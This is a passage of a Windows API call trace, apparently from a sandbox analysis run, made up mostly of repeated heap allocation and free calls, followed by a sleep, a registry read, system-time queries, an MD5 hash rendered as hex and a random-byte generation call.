hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.201] GetProcessHeap () returned 0xe30000 [0090.201] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.201] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.202] GetProcessHeap () returned 0xe30000 [0090.202] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.202] GetProcessHeap () returned 0xe30000 [0090.203] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.203] GetProcessHeap () returned 0xe30000 [0090.203] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.203] GetProcessHeap () returned 0xe30000 [0090.203] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.203] GetProcessHeap () returned 0xe30000 [0090.203] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.203] GetProcessHeap () returned 0xe30000 [0090.203] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.203] GetProcessHeap () returned 0xe30000 [0090.266] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0090.266] GetProcessHeap () returned 0xe30000 [0090.266] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.267] GetProcessHeap () returned 0xe30000 [0090.267] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.268] GetProcessHeap () returned 0xe30000 [0090.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.268] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.269] GetProcessHeap () returned 0xe30000 [0090.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.270] GetProcessHeap () returned 0xe30000 [0090.270] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedbc50 | out: hHeap=0xe30000) returned 1 [0090.270] GetProcessHeap () returned 0xe30000 [0090.270] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0090.270] GetProcessHeap () returned 0xe30000 [0090.270] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe55bd0 | out: hHeap=0xe30000) returned 1 [0090.270] GetProcessHeap () returned 0xe30000 [0090.270] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0090.271] Sleep (dwMilliseconds=0xea60) [0100.362] GetTickCount () returned 0x118b2a4 [0100.362] GetProcessHeap () returned 0xe30000 [0100.362] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0x681e0b8 [0100.363] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x681e0b8, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0x681e0b8*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0100.367] GetProcessHeap () returned 0xe30000 [0100.367] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681e0b8 | out: hHeap=0xe30000) returned 1 [0100.367] GetTickCount () returned 0x118b2a4 [0100.367] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0100.367] GetCurrentProcess () returned 0xffffffff [0100.367] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0100.367] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed5080) returned 1 [0100.368] CryptCreateHash (in: hProv=0xed5080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0100.368] CryptHashData (hHash=0xec1d70, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0100.368] CryptGetHashParam (in: hHash=0xec1d70, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0100.368] CryptGetHashParam (in: hHash=0xec1d70, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0100.368] CryptDestroyHash (hHash=0xec1d70) returned 1 [0100.368] CryptReleaseContext (hProv=0xed5080, dwFlags=0x0) returned 1 [0100.368] GetProcessHeap () returned 0xe30000 [0100.368] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0x681d290 [0100.368] wnsprintfA (in: pszDest=0x681d290, cchDest=4, pszFmt="%02x" | out: pszDest="5e") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d292, cchDest=4, pszFmt="%02x" | out: pszDest="7d") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d294, cchDest=4, pszFmt="%02x" | out: pszDest="20") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d296, cchDest=4, pszFmt="%02x" | out: pszDest="96") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d298, cchDest=4, pszFmt="%02x" | out: pszDest="06") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d29a, cchDest=4, pszFmt="%02x" | out: pszDest="ac") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d29c, cchDest=4, pszFmt="%02x" | out: pszDest="20") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d29e, cchDest=4, pszFmt="%02x" | out: pszDest="8c") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2a0, cchDest=4, pszFmt="%02x" | out: pszDest="f3") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2a2, cchDest=4, pszFmt="%02x" | out: pszDest="8d") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2a4, cchDest=4, pszFmt="%02x" | out: pszDest="3b") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2a6, cchDest=4, pszFmt="%02x" | out: pszDest="79") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2a8, cchDest=4, pszFmt="%02x" | out: pszDest="9b") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2aa, cchDest=4, pszFmt="%02x" | out: pszDest="9c") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2ac, cchDest=4, pszFmt="%02x" | out: pszDest="77") returned 2 [0100.368] wnsprintfA (in: pszDest=0x681d2ae, cchDest=4, pszFmt="%02x" | out: pszDest="fb") returned 2 [0100.369] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed5218) returned 1 [0100.369] CryptGenRandom (in: hProv=0xed5218, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0100.369] CryptReleaseContext (hProv=0xed5218, dwFlags=0x0) returned 1 [0100.369] GetProcessHeap () returned 0xe30000 [0100.369] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf1dfa0 [0100.369] GetProcessHeap () returned 0xe30000 [0100.369] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9e3c8 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0x681ed88 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x681d420 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681ed88 | out: hHeap=0xe30000) returned 1 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x681abc0 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0x681ae50 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9e188 [0100.370] GetProcessHeap () returned 0xe30000 [0100.370] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x681b2e0 [0100.370] GetProcessHeap () returned 0xe30000 [0100.371] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x68220c0 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0x6821380 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6822550 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f098 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x68229e8 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6821380 | out: hHeap=0xe30000) returned 1 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6822c78 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68229e8 | out: hHeap=0xe30000) returned 1 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f5f0 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.371] GetProcessHeap () returned 0xe30000 [0100.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.371] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x68229e8 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9f5f0 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6823108 [0100.372] GetProcessHeap () returned 0xe30000 [0100.372] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68229e8 | out: hHeap=0xe30000) returned 1 [0100.372] GetProcessHeap () 